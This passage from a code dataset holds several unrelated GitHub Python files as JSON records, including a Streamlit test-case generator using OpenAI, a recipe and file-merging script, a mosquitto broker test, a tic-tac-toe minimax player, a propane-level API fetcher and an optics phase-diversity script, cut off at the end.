Iterator[Element]:\n\t\tfor el in self.elements:\n\t\t\tif el.type in types:\n\t\t\t\tyield el\n\n\tdef element_for_id(self, id: str) -> Element:\n\t\tfor el in self.elements:\n\t\t\tif el.id == id:\n\t\t\t\treturn el\n\t\treturn None\n\t\n\tdef element_for_scope(self, scope: int) -> Element:\n\t\tfor el in self.elements:\n\t\t\tif el.container_scope == scope:\n\t\t\t\treturn el\n\t\treturn None\n\t\n\tdef elements_in_scope(self, scope: int, types: List[str] = None) -> Iterator[Element]:\n\t\tfor el in self.elements:\n\t\t\tif el.scope == scope and (types is None or 
el.type in types):\n\t\t\t\tyield el\n\n\tdef __repr__(self) -> str:\n\t\treturn '\\n'.join(str(el) for el in self.elements)\n","repo_name":"teemulehtinen/qlcpy","sub_path":"qlcpy/instrument/ProgramData.py","file_name":"ProgramData.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
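A usage sketch of ProgramData against a two-line program, assuming the package-relative imports resolve; a plain list stands in for NodeStack, since Reference only calls .copy() on it.

import ast

tree = ast.parse("x = 1\nprint(x)")
data = ProgramData()

# Declare x where it is assigned, then record the read inside print(x).
el = data.declare("variable", scope=0, id="x",
                  declaration=tree.body[0].targets[0], stack=[])
el.reference(tree.body[1].value.args[0], [])
print(data)   # variable: (S0) x, declared on 1, referenced on 2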
+{"seq_id":"45989110637","text":"import dotenv\nimport openai\nimport re\nimport pandas as pd\nimport streamlit as st\nfrom streamlit_lottie import st_lottie\nfrom utils import load_lottie_url\n\nst.set_page_config(page_title=\"TestCaseGPT\", page_icon=\"🤖\", layout=\"wide\")\nconfig = dotenv.dotenv_values(\".env\")\nopenai.api_key = config['OPENAI_API_KEY']\n\nwith st.sidebar:\n lottie_image1 = load_lottie_url('https://assets1.lottiefiles.com/packages/lf20_ofa3xwo7.json')\n st_lottie(lottie_image1)\n\nst.markdown(\n \"\"\"\n TestCaseGPT,测试流程加速器 🚀️
\n 将用户故事转化为测试用例,只需一步 !
\n \"\"\",\n unsafe_allow_html=True\n)\n\n\ndef local_css(file_name):\n with open(file_name) as f:\n st.markdown(f\"\", unsafe_allow_html=True)\n\n\nlocal_css(\"style.css\")\nuser_story = st.text_input(label=\"📖 用户故事\", label_visibility=\"hidden\",\n placeholder=\"【用户故事描述】:作为___,我希望___,以便___。\", key=\"input\")\n\nprompt_userstory = \"我希望你作为一个软件产品经理,负责生成验收标准,用来验证软件是否符合用户故事中指定的功能要求。验收标准应该是具体的、可衡量的、可实现的、相关的。此外,你应该确保验收标准涵盖所有可能的情况和边缘案例。通过定义清晰而全面的验收标准,你可以帮助确保软件符合必要的标准,并确保用户的需求得到满足。按照描述的格式,就下面的主题写出10条专业而详细的验收标准。请尽你最大的努力。用中文回答。只返回验收标准的内容。不要返回其他内容。\" \\\n \"\\n主题: \" + user_story\n\nprompt_testcase = \"您是软件测试和软件质量保证方面的专家,专门从事功能测试,您帮助我之前的许多人生成了满足特定要求的功能测试用例。\\n\" \\\n \"您生成的测试用例能涵盖正常场景、异常场景、边界场景。\\n\" \\\n \"您生成的测试用例优先级包括 P0、P1、P2,P0为最高优先级,P2代表最低优先级。\\n\" \\\n \"以所述测试用例格式,至少编写五条关于以下主题的专业和详细测试用例。尽你最大的努力。请使用中文回答, 请勿返回除测试用例内容以外的其他内容。不要用引号包装响应。\\n\" \\\n \"测试用例格式:\\n\" \\\n \"用例编号:\\n\" \\\n \"用例名称:\\n\" \\\n \"用例类型:\\n\" \\\n \"优先级:\\n\" \\\n \"前置条件:\\n\" \\\n \"步骤描述:\\n\" \\\n \"预期结果:\\n\" \\\n \"主题: \"\n\n\ndef clean_criteria(text):\n # 先对文本按照换行符进行分割\n lines = text.split(\"\\n\")\n new_lines = []\n for line in lines:\n # 如果是空行,空字符串,单个字符串,直接丢弃\n if len(line) < 2:\n continue\n new_lines.append(re.sub(r'^(\\d+).', '📝 ', line))\n\n text = \"\\n\".join(new_lines)\n return text\n\n\ndef clean_testcase(text):\n # 先对文本按照换行符进行分割,如果有连续的换行符,那么分割出来的元素会是空字符串\n lines = text.split(\"\\n\")\n new_lines = \"\"\n for line in lines:\n # 如果不是空字符串,那么就是正常的文本,需要进行处理\n if line != \"\":\n # 先把正常文本开头的数字和点给去掉\n line = re.sub(r'^(\\d+)\\. ', '', line)\n # 继续去除末尾的空字符串\n line = line.rstrip()\n # 把处理好的文本拼接起来\n new_lines += line + \" \"\n # 如果是空字符串,那么就是连续的换行符\n else:\n # 先把新字符串末尾的\n new_lines.rstrip(\" \")\n # 再添加一个换行符,用来分隔不同的测试用例\n new_lines += \"\\n\"\n\n return new_lines\n\n\ndef output_criteria(prompt):\n # 输出验收标准\n generate_criteria = \"\"\n openai_resp = []\n for resp in openai.Completion.create(model=\"text-davinci-003\", prompt=prompt, stream=True,\n max_tokens=1024,\n temperature=0.7\n ):\n openai_resp.append(resp.choices[0].text)\n generate_criteria = \"\".join(openai_resp).strip()\n formatted_text = f\"{clean_criteria(generate_criteria)}
\"\n criteria_box.markdown(formatted_text, unsafe_allow_html=True)\n return generate_criteria\n\n\ndef output_testcase(case_title):\n formatted_text = \"\"\n openai_resp = []\n prompt = prompt_testcase + case_title\n for resp in openai.Completion.create(model=\"text-davinci-003\", prompt=prompt, stream=True,\n max_tokens=3072,\n temperature=0.7):\n openai_resp.append(resp.choices[0].text)\n generate_testcase = \"\".join(openai_resp).strip()\n formatted_text = clean_testcase(generate_testcase)\n markdown_text = f\"{formatted_text}
\"\n case_box.markdown(markdown_text, unsafe_allow_html=True)\n return formatted_text\n\n\ndef export_testcase(InputCase):\n # 定义正则表达式\n regex = r\"用例编号(.+) 用例名称(.+) 用例类型(.+) 优先级(.+) 前置条件(.+) 步骤描述(.+) 预期结果(.+)\"\n TestCaseLines = re.findall(regex, InputCase)\n CaseIds = []\n Names = []\n CaseTypes = []\n Priorities = []\n Preconditions = []\n Steps = []\n ExpectedResults = []\n for line in TestCaseLines:\n # 删除开头的中英文冒号和空格\n CaseId = line[0]\n CaseId = re.sub(r'^:', '', CaseId)\n CaseId = re.sub(r'^:', '', CaseId).strip()\n CaseIds.append(CaseId)\n\n # 删除开头的中英文冒号和空格\n Name = line[1]\n Name = re.sub(r'^:', '', Name)\n Name = re.sub(r'^:', '', Name).strip()\n Names.append(Name)\n\n # 删除开头的中英文冒号和空格\n CaseType = line[2]\n CaseType = re.sub(r'^:', '', CaseType)\n CaseType = re.sub(r'^:', '', CaseType).strip()\n CaseTypes.append(CaseType)\n\n # 删除开头的中英文冒号和空格\n Priority = line[3]\n Priority = re.sub(r'^:', '', Priority)\n Priority = re.sub(r'^:', '', Priority).strip()\n Priorities.append(Priority)\n\n # 删除开头的中英文冒号和空格\n Precondition = line[4]\n Precondition = re.sub(r'^:', '', Precondition)\n Precondition = re.sub(r'^:', '', Precondition).strip()\n Preconditions.append(Precondition)\n\n # 删除开头的中英文冒号和空格\n Step = line[5]\n Step = re.sub(r'^:', '', Step)\n Step = re.sub(r'^:', '', Step).strip()\n Steps.append(Step)\n\n # 删除开头的中英文冒号和空格\n ExpectedResult = line[6]\n ExpectedResult = re.sub(r'^:', '', ExpectedResult)\n ExpectedResult = re.sub(r'^:', '', ExpectedResult).strip()\n ExpectedResults.append(ExpectedResult)\n\n test_case_data = {'用例名称': Names, '用例类型': CaseTypes, '优先级': Priorities,\n '前置条件': Preconditions,\n '步骤描述': Steps, '预期结果': ExpectedResults}\n data = pd.DataFrame(test_case_data)\n st.dataframe(data)\n\n # 将DataFrame写入Excel文件\n excel_data = {'用例名称': Names, '用例类型': CaseTypes, '优先级': Priorities,\n '前置条件': Preconditions,\n '步骤描述': Steps, '预期结果': ExpectedResults, '维护人': \"marsdev\"}\n data = pd.DataFrame(excel_data)\n data.to_excel('测试用例.xlsx', index=False)\n\n # 将Excel文件读取为字节流\n\n if st.download_button:\n st.error('想体验更多付费功能,请升级到 Testcaseplus💫', icon=\"🚨\")\n with open('测试用例.xlsx', 'rb') as f:\n excel_bytes = f.read()\n # 将Excel文件作为字节流提供给用户进行下载\n st.download_button(label='导出测试用例', data=excel_bytes, file_name='测试用例.xlsx',\n mime='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n\n\nif st.button(\"一键生成测试用例\", type=\"primary\"):\n user_story.replace(\"\\n\", \"\")\n if not user_story:\n st.warning('请输入用户故事')\n st.stop()\n\n criteria_box = st.expander(label=\"测试点拆分\", expanded=True)\n with criteria_box:\n criteria_box = st.empty()\n criteria = output_criteria(prompt_userstory)\n testcase_box = st.expander(label=\"测试用例生成\", expanded=True)\n with testcase_box:\n case_box = st.empty()\n all_case = re.split(r\"\\n\", criteria)\n case_list = []\n for case in all_case:\n print(\"before sub\")\n print(case)\n case = re.sub(r'^(\\d+).', '', case)\n case = case.lstrip()\n print(\"after sub\")\n print(case)\n if len(case) < 2:\n continue\n case_list.append(case)\n print(case_list)\n testcase = output_testcase(case_list[0])\n export_testcase(testcase)\n\n","repo_name":"sunwandi04/testcase","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9512,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"75083079264","text":"import os\n\ncook_book = dict()\n\nwith open('recipes.txt', 'r', encoding='utf-8') as f:\n lines = f.readlines()\n list = []\n result = []\n n = '\\n'\n for l in lines:\n if l == '\\n':\n list += l\n result.append(list)\n list = []\n else:\n list.append(l)\n result.append(list)\n\nfor cook_list in result:\n ingredient_list = []\n\n for list_ in cook_list:\n list = list_.replace('\\n', '')\n if \"|\" in list:\n ing_list = list.split(' | ')\n ingredient_list.append(ing_list)\n ing_list = []\n\n for ing_list_2 in ingredient_list:\n ing_dict = dict()\n if ing_list_2:\n ing_dict['ingredient_name'] = ing_list_2[0]\n ing_dict['quantity'] = ing_list_2[1]\n ing_dict['measure'] = ing_list_2[2]\n ing_list.append(ing_dict)\n cook_book[cook_list[0].replace('\\n', '')] = ing_list\n\n\ndef get_shop_list_by_dishes(dishes: list, person_count: int) -> dict:\n \"\"\"Функция обрабатывает список блюд и количество персон.\n\n :param dishes: Список блюд.\n :param person_count: Количество человек.\n :return: Выводит на экран список ингредиентов\n для приготовления всех блюд.\n \"\"\"\n food_basket = {}\n for dish in dishes:\n if dish not in cook_book:\n raise TypeError(f'{dish} отсутствует в кулинарной книге')\n for ingredient in cook_book[dish]:\n if ingredient['ingredient_name'] not in food_basket:\n food_basket[ingredient['ingredient_name']] \\\n = {'measure': ingredient['measure'], 'quantity': \\\n int(ingredient['quantity']) * person_count}\n else:\n food_basket[ingredient['ingredient_name']]['quantity'] \\\n += int(ingredient['quantity']) * person_count\n return food_basket\n\n\ndef get_dirs_and_files():\n \"\"\" Функция создает ссылку \"dirs\" на заданную директорию и\n создает список файлов в ней.\n\n :return: Вызывает функцию get_len_files() и передает\n подготовленные данные.\"\"\"\n path = os.path.join(os.getcwd() + '\\sorted/')\n result = os.walk(path)\n for dirs, folder, files in result:\n dirs_ = dirs\n files_ = files\n return get_len_files(dirs_, files_)\n\n\ndict_lens_and_files = dict()\n\n\ndef get_len_files(dirs, files):\n \"\"\" Функция создает словарь. 
Ключами словаря являются количкество\n строк в файлах, а значениями имена файлов соответственно.\n\n :param dirs: Ссылка на заданную директорию.\n :param files: Список файлов в заданной папке.\n :return: Вызывает функцию sorted_files_dict().\"\"\"\n for file in files:\n file_path = dirs + file\n with open(file_path, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n file_len = len(lines)\n dict_lens_and_files[file_len] = file\n return sorted_files_dict()\n\n\nsorted_dict = dict()\n\n\ndef sorted_files_dict():\n \"\"\" Функция сортирует словарь по ключу.\n :return: Вызывает функцию save_sorted_files().\"\"\"\n sorted_dict.update(dict(sorted(dict_lens_and_files.items())))\n return save_sorted_files()\n\n\ndef save_sorted_files():\n \"\"\" Функция записывает информацию о всех файлах и текст из самих файлов\n из заданной папки в новый файл.\n Каждый раз файл удаляется и создается заново.\n :return: Результат всей операции выводится на экран.\"\"\"\n file_link = os.path.join(os.getcwd(), 'file.txt')\n os.remove(file_link)\n for file_num in sorted_dict:\n file_for_link = sorted_dict.get(file_num)\n file_link_ = os.path.join(os.getcwd() + '\\sorted/', file_for_link)\n h1 = sorted_dict.get(file_num)\n with open(file_link_, 'rt', encoding='utf-8') as fl:\n lines = fl.readlines()\n with open(file_link, 'a+') as f:\n f.write(f'{h1}\\n')\n f.write(f'{file_num}\\n')\n for line in lines:\n f.write(line.strip())\n f.write(f'\\n')\n f.flush()\n with open('file.txt') as f1:\n result = f1.read()\n return result\n\n\nprint()\nprint()\n\n# Вызываем функцию по получению списка продуктов из кулинарной\n# книги согласно списку блюд\nprint(get_shop_list_by_dishes(['Запеченный картофель', 'Омлет', 'Фахитос'], 2))\n\nprint()\nprint()\n\n# Вызываем функцию для последующей сортировки и объединения\n# текстовых файлов в один\nprint(get_dirs_and_files())\n","repo_name":"VolshVs/OOP_2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"73856997022","text":"from concurrent.futures import ThreadPoolExecutor, as_completed\nfrom typing import Union\n\nfrom gpt_generator.modules.architector import gpt_architector\nfrom gpt_generator.modules.worker import gpt_worker\nfrom helpers.architecture_extractor import structure_2_dict\nfrom helpers.code_extractor import extract_code\nfrom models.file_interface import File_Collection, File_to_write\nfrom models.gpt_responses_interface import ArchitectorResponse\n\nimport logging\n\nlogging.basicConfig(level=logging.ERROR)\n\n\ndef gpt_main(prompt: str) -> File_Collection:\n try:\n # Generate initial project and response\n project, response = gpt_architector(prompt)\n\n # Assert project is of the correct type\n assert isinstance(project, ArchitectorResponse)\n\n # Initialize File_Collection\n file_collection = File_Collection(project.name)\n\n # Add initial response to collection\n file_collection.collections[\"raw_responses\"].append(\n File_to_write(\"architector.txt\", str(response))\n )\n\n structure_dictionary: dict[str, str] = structure_2_dict(project.structure)\n\n # Create a ThreadPool to execute gpt_worker on each file\n with ThreadPoolExecutor() as executor:\n future_to_file = {executor.submit(\n gpt_worker, project, file.file_name, file.description): file for file in project.files}\n\n for future in as_completed(future_to_file):\n try:\n # Obtain the completed future's corresponding file\n file = future_to_file[future]\n\n # Get the result from the future\n result = future.result()\n\n # Add results to the collection\n file_collection.collections[\"raw_responses\"].append(\n File_to_write(f\"raw_{file.file_name}.txt\", result, \"\")\n )\n file_collection.collections[\"formatted_responses\"].append(\n File_to_write(file.file_name, extract_code(result),\n structure_dictionary[file.file_name])\n )\n except Exception as e:\n # Log any exceptions that occur within the thread\n logging.error(f\"An error occurred in thread: {e}\")\n\n return file_collection\n\n except Exception as e:\n # Log any other exceptions\n logging.error(f\"An error occurred: {e}\")\n return File_Collection(\"\")\n","repo_name":"bukomp/mAIcroservicer","sub_path":"src/gpt_generator/gpt_main.py","file_name":"gpt_main.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"14526738976","text":"#!/usr/bin/env python\n\nimport subprocess\n\nimport inspect, os, sys\n# From http://stackoverflow.com/questions/279237/python-import-a-module-from-a-folder\ncmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],\"..\")))\nif cmd_subfolder not in sys.path:\n sys.path.insert(0, cmd_subfolder)\n\nimport mosq_test\n\ndef write_config(filename, port1, port2):\n with open(filename, 'w') as f:\n f.write(\"port %d\\n\" % (port1))\n f.write(\"\\n\")\n f.write(\"listener %d\\n\" % (port2))\n f.write(\"mount_point mount/\\n\")\n f.write(\"\\n\")\n f.write(\"log_type debug\\n\")\n\n(port1, port2) = mosq_test.get_port(2)\nconf_file = os.path.basename(__file__).replace('.py', '.conf')\nwrite_config(conf_file, port1, port2)\n\nrc = 1\nkeepalive = 60\nconnect_packet = mosq_test.gen_connect(\"test2\", keepalive=keepalive)\nconnack_packet = mosq_test.gen_connack(rc=0)\n\nmid = 1\nsubscribe_packet = mosq_test.gen_subscribe(mid, \"#\", 0)\nsuback_packet = mosq_test.gen_suback(mid, 0)\n\npublish_packet = mosq_test.gen_publish(\"mount/test\", qos=0, payload=\"mount point\")\n\nbroker = mosq_test.start_broker(filename=os.path.basename(__file__), use_conf=True, port=port1)\n\ntry:\n sock = mosq_test.do_client_connect(connect_packet, connack_packet, timeout=20, port=port1)\n sock.send(subscribe_packet)\n\n if mosq_test.expect_packet(sock, \"suback\", suback_packet):\n pub = subprocess.Popen(['./10-listener-mount-point-helper.py', str(port2)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n pub.wait()\n (stdo, stde) = pub.communicate()\n # Should have now received a publish command\n\n if mosq_test.expect_packet(sock, \"publish\", publish_packet):\n rc = 0\n\n sock.close()\nfinally:\n os.remove(conf_file)\n broker.terminate()\n broker.wait()\n (stdo, stde) = broker.communicate()\n if rc:\n print(stde)\n\nexit(rc)\n\n","repo_name":"hui6075/mosquitto-cluster","sub_path":"test/broker/10-listener-mount-point.py","file_name":"10-listener-mount-point.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":316,"dataset":"github-code","pt":"7"}
+{"seq_id":"2372667998","text":"import copy\nimport random\n\n\nclass AI:\n\n def __init__(self, player=2):\n self.player = player\n\n def random(self, board):\n empty_squares = board.get_empty_squares()\n random_index = random.randrange(0, len(empty_squares))\n return empty_squares[random_index]\n\n def minimax(self, board, maximizing):\n\n case = board.check_victory_conditions()\n\n if case == 1:\n return 1, None\n\n if case == 2:\n return -1, None\n\n elif board.isfull():\n return 0, None\n\n if maximizing:\n max_evaluation = -10\n best_move = None\n empty_squares = board.get_empty_squares()\n\n for (row, col) in empty_squares:\n temp_board = copy.deepcopy(board)\n temp_board.mark_square(row, col, 1)\n evaluation = self.minimax(temp_board, False)[0]\n if evaluation > max_evaluation:\n max_evaluation = evaluation\n best_move = (row, col)\n\n return max_evaluation, best_move\n\n elif not maximizing:\n min_evaluation = 10\n best_move = None\n empty_squares = board.get_empty_squares()\n\n for (row, col) in empty_squares:\n temp_board = copy.deepcopy(board)\n temp_board.mark_square(row, col, self.player)\n evaluation = self.minimax(temp_board, True)[0]\n if evaluation < min_evaluation:\n min_evaluation = evaluation\n best_move = (row, col)\n\n return min_evaluation, best_move\n\n def evaluate_impossible_difficulty(self, main_board):\n evaluation, move = self.minimax(main_board, False)\n return move\n\n def evaluate_medium_difficulty(self, main_board):\n move = self.random(main_board)\n i = random.randint(1, 6)\n if i in range(1, 5):\n evaluation, move = self.minimax(main_board, False)\n return move\n\n def evaluate_easy_difficulty(self, main_board):\n move = self.random(main_board)\n return move\n","repo_name":"Tox2401/TicTacToe","sub_path":"AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"13629392545","text":"# Get propane data from Otodata API\n# The time-based series are stored in InfluxDB.\n\n# Requires username/password used with the Nee-vo mobile app (or similar app)\n\nimport json\nimport requests\nimport datetime\nfrom pytz import timezone\nfrom influxdb import InfluxDBClient\n\n# Set parameters\nNEEVO_AUTH = ''\nTIMEZONE = 'US/Eastern'\nPROVIDER_NAME = ''\nMETRIC_NAME = 'propane'\n\nINFLUXDB_HOST = ''\nINFLUXDB_PORT = ''\nINFLUXDB_USERNAME = ''\nINFLUXDB_PASSWORD = ''\nINFLUXDB_DATABASE = ''\n\n# Instantiate database\ninfluxClient = InfluxDBClient(\n host=INFLUXDB_HOST,\n port=INFLUXDB_PORT,\n username=INFLUXDB_USERNAME,\n password=INFLUXDB_PASSWORD,\n database=INFLUXDB_DATABASE\n)\n\n\ndef getDateTimeByZone(tz):\n t = timezone(tz)\n return datetime.datetime.now(t)\n\n\ndef printme(str):\n t = getDateTimeByZone(TIMEZONE)\n print(t.strftime(\"%Y-%m-%d %H:%M:%S\"), str)\n return\n\n\ndef processChartData(tank_size, tank_level):\n try:\n remaining = (tank_level/100) * tank_size\n json_body = []\n json_body.append({\n \"measurement\": METRIC_NAME,\n \"tags\": {\n \"source\": PROVIDER_NAME\n },\n \"time\": getDateTimeByZone(TIMEZONE),\n \"fields\": {\n \"litres\": remaining,\n \"level\": tank_level\n }\n })\n influxClient.write_points(json_body)\n\n except Exception as e:\n if hasattr(e, 'message'):\n printme(e.message)\n else:\n printme(e)\n exit(0)\n\ndef main():\n\n session = requests.Session()\n\n printme(\"Getting levels\")\n r = session.get(\n \"https://telematics.otodatanetwork.com:4432/v1.5/DataService.svc/GetAllDisplayPropaneDevices\",\n headers={\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US;q=1, fa-US;q=0.9\",\n \"User-Agent\": \"Nee-Vo/2.5 (iPhone; iOS 16.0.2; Scale/3.00)\",\n \"Host\": \"telematics.otodatanetwork.com:4432\",\n \"Authorization\": NEEVO_AUTH\n }\n )\n\n j = json.loads(r.text)\n processChartData(j[0]['TankCapacity'], j[0]['Level'])\n\n printme('Finished')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CeeBeeEh/Otodata-HASS","sub_path":"otodata-hass.py","file_name":"otodata-hass.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"20295782830","text":"from typing import Iterable\nfrom meshed import DAG\nfrom front import APP_KEY, RENDERING_KEY, ELEMENT_KEY, NAME_KEY\nfrom collections.abc import Callable\nfrom front.crude import prepare_for_crude_dispatch\nfrom streamlitfront.elements import TextInput, SelectBox\n\nfrom streamlitfront.base import mk_app\nfrom streamlitfront.examples.util import Graph\nfrom streamlitfront.elements import (\n AudioRecorder,\n FileUploader,\n MultiSourceInput,\n)\nimport streamlit as st\n\nparam_to_mall_maps = dict(train_audio='train_audio', tag='tag_store')\n\nif 'mall' not in st.session_state:\n st.session_state['mall'] = dict(\n # train_audio={},\n # tag={},\n # unused_store={\"to\": \"illustrate\"},\n tag_sound_output={}\n )\n\nmall = st.session_state['mall']\n# mall = dict(\n# # train_audio={},\n# # tag={},\n# # unused_store={\"to\": \"illustrate\"},\n# tag_sound_output={}\n# )\n\n\ndef crudify(funcs):\n for func in funcs:\n yield prepare_for_crude_dispatch(\n func, param_to_mall_map=param_to_mall_map, mall=mall\n )\n\n\nWaveForm = Iterable[int]\n\n\n# @code_to_dag\n@prepare_for_crude_dispatch(mall=mall, output_store='tag_sound_output')\ndef tag_sound(train_audio: WaveForm, tag: str):\n # mall[\"tag_store\"] = tag\n return (train_audio, tag)\n\n\n@prepare_for_crude_dispatch(mall=mall, param_to_mall_map={'result': 'tag_sound_output'})\ndef display_tag_sound(result):\n return result\n\n\n# crudified_tag_sound = prepare_for_crude_dispatch(\n# tag_sound, mall=mall, output_store=\"tag_sound_output\"\n# )\n# crudified_display_tag_sound = prepare_for_crude_dispatch(\n# display_tag_sound, mall=mall, param_to_mall_map={\"result\": \"tag_sound_output\"}\n# )\n\nprint(type(tag_sound))\nfrom i2 import Sig\n\nprint(Sig(display_tag_sound))\n\nconfig_ = {\n APP_KEY: {'title': 'Simple Real Audio ML'},\n # OBJ_KEY: {\"trans\": crudify},\n RENDERING_KEY: {\n 'tag_sound': {\n # \"description\": {\"content\": \"A very simple learn model example.\"},\n 'execution': {\n 'inputs': {\n 'train_audio': {\n ELEMENT_KEY: MultiSourceInput,\n 'From a file': {ELEMENT_KEY: FileUploader, 'type': 'wav',},\n 'From the microphone': {ELEMENT_KEY: AudioRecorder},\n },\n # \"tag\": {\n # ELEMENT_KEY: TextInput,\n # },\n },\n }\n },\n 'display_tag_sound': {\n 'execution': {\n 'inputs': {\n 'result': {\n ELEMENT_KEY: SelectBox,\n 'options': mall['tag_sound_output'],\n },\n }\n },\n },\n DAG: {'graph': {ELEMENT_KEY: Graph, NAME_KEY: 'Flow',},},\n Callable: {\n 'execution': {\n 'inputs': {\n 'save_name': {ELEMENT_KEY: TextInput, NAME_KEY: 'Save output as',},\n }\n },\n },\n },\n}\n\napp = mk_app([tag_sound, display_tag_sound], config=config_)\napp()\nst.write(mall)\n","repo_name":"otosense/plunk","sub_path":"plunk/sb/front_experiments/edge_interface/sound_tagger.py","file_name":"sound_tagger.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"8360088824","text":"'''\nGiven a string if all the chars are unique \n\treturn True\nelse \n\treturn False\n'''\n\n# Time complexity is O(n)\n\ndef IsAllCharsUnique(string):\n\tstring_dict = {}\n\n\tfor i in string:\n\t\tif i in string_dict: return False\n\t\telse: string_dict[i] = 1 \n\n\treturn True\n\nprint(IsAllCharsUnique(\"aebcde\"))","repo_name":"Manoji97/Data-Structures-Algorithms-Complete","sub_path":"InterviewQuestions/Python/1_Arrays/7_UniqueCharsInString.py","file_name":"7_UniqueCharsInString.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"29466616996","text":"import phaseDiversity3PSFs as PD\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport fs\nimport os\nimport pyfits\n#import seaborn as sns\n#sns.set()\n\npupilRadius = 1.6e-3\nlbda = 0.6375e-6\nF = 80e-3\npxsize = 5.3e-6\nN = 400\ndxp = lbda*F/(N*pxsize)\ndeltaZ = 3.19e-3\njmin = 4\njmax = 30\n\n#retrieve ajsIDL and ajsTrue\n\najsTrueFolderPath = 'C:\\\\Users\\\\Jojo\\\\Desktop\\\\PdM-HEIG\\\\Science\\\\data\\\\devPD\\\\PSFforIDLtreatment\\\\ajsTrue'\najsTrueFile = os.listdir(ajsTrueFolderPath)\najsIDLFolderPath = 'C:\\\\Users\\\\Jojo\\\\Desktop\\\\PdM-HEIG\\\\Science\\\\data\\\\devPD\\\\PSFforIDLtreatment\\\\IDLajs'\najsIDLFile = os.listdir(ajsIDLFolderPath)\n\njsTrue = np.zeros([len(ajsIDLFile),jmax-jmin+1])\najsTrue = np.zeros([len(ajsIDLFile),jmax-jmin+1])\nrmsWFeTrue = np.zeros(len(ajsIDLFile))\n\njsIDL = np.zeros([len(ajsIDLFile),jmax-jmin+1])\najsIDLmodal = np.zeros([len(ajsIDLFile),jmax-jmin+1])\nrmsWFeIDLmodalretrieved = np.zeros(len(ajsIDLFile))\nrmsemodal = np.zeros(len(ajsIDLFile))\n\najsIDLzonal = np.zeros([len(ajsIDLFile),jmax-jmin+1])\nrmsWFeIDLzonalretrieved = np.zeros(len(ajsIDLFile))\nrmsezonal = np.zeros(len(ajsIDLFile))\n\nrmsWFeIDLtrue = np.zeros(len(ajsIDLFile))\n\nfor i in np.arange(len(ajsIDLFile)):\n rmsWFeTrue[i] = (((ajsTrueFile[i]).replace('.','_')).split('_'))[-2]\n rmsWFeIDLtrue[i] = (((ajsIDLFile[i]).replace('.','_')).split('_'))[-2]\n \n jsajsTrue = np.loadtxt(ajsTrueFolderPath+'\\\\'+ajsTrueFile[i])\n jsTrue[i,:] = jsajsTrue[0,:]\n ajsTrue[i,:] = jsajsTrue[1,:]*1e9*lbda/2/np.pi\n \n jsajsIDL = np.loadtxt(ajsIDLFolderPath+'\\\\'+ajsIDLFile[i],delimiter=',',skiprows=1)\n jsIDL[i,:] = jsajsIDL[:,0]\n ajsIDLmodal[i,:] = jsajsIDL[:,1]*1000\n ajsIDLzonal[i,:] = jsajsIDL[:,2]*1000\n \n rmsWFeIDLmodalretrieved[i] = fs.RMSwavefrontError(jsIDL[i,:],ajsIDLmodal[i,:])\n rmsemodal[i] = fs.RMSE(ajsIDLmodal[i,:],ajsTrue[i,:])\n rmsWFeIDLzonalretrieved[i] = fs.RMSwavefrontError(jsIDL[i,:],ajsIDLzonal[i,:])\n rmsezonal[i] = fs.RMSE(ajsIDLzonal[i,:],ajsTrue[i,:])\n\n\nrmsWFefolderPath = 'C:\\\\Users\\\\Jojo\\\\Desktop\\\\PdM-HEIG\\\\Science\\\\data\\\\devPD\\\\PSFforIDLtreatment\\\\PSFs'\nrmsWFerrorFolderPaths = os.listdir(rmsWFefolderPath)\n\nNrmsWFe = len(rmsWFerrorFolderPaths)\nrmsePy = np.zeros(NrmsWFe)\nrmsWFerrorsPyRetrieved = np.zeros(NrmsWFe)\nrmsWFeTruePy = np.zeros(NrmsWFe)\njsretrieved = np.zeros([NrmsWFe,jmax-jmin+1])\najsretrieved = np.zeros([NrmsWFe,jmax-jmin+1])\n\nfor irms,rmsWFdir in enumerate(rmsWFerrorFolderPaths):\n PSFfolderPaths = rmsWFefolderPath+'\\\\' + rmsWFdir\n sPSFfiles = os.listdir(PSFfolderPaths)\n rmsWFeTruePy[irms] = (rmsWFdir.split('_'))[-1]\n \n PSFs = np.zeros([3,400,400])\n deltaZs = np.array([])\n for ipsf,sPSFfile in enumerate(sPSFfiles):\n PSFfilePath = rmsWFefolderPath+ '\\\\' + rmsWFdir + '\\\\' + sPSFfile\n hdulist = pyfits.open(PSFfilePath)\n PSFs[ipsf,:,:] = hdulist[0].data\n deltaZs = np.append(deltaZs,int(((sPSFfile.replace('.','_')).split('_'))[-2]))\n \n IxdeltaZ =np.argsort(deltaZs)\n \n phaseDiv = PD.phaseDiversity3PSFs(PSFs[IxdeltaZ[1],:,:],PSFs[IxdeltaZ[2],:,:],PSFs[IxdeltaZ[0],:,:],deltaZ,lbda,pxsize,F,pupilRadius,jmin,jmax)\n \n jsretrieved[irms,:] = phaseDiv.result['js']\n ajsretrieved[irms,:] = 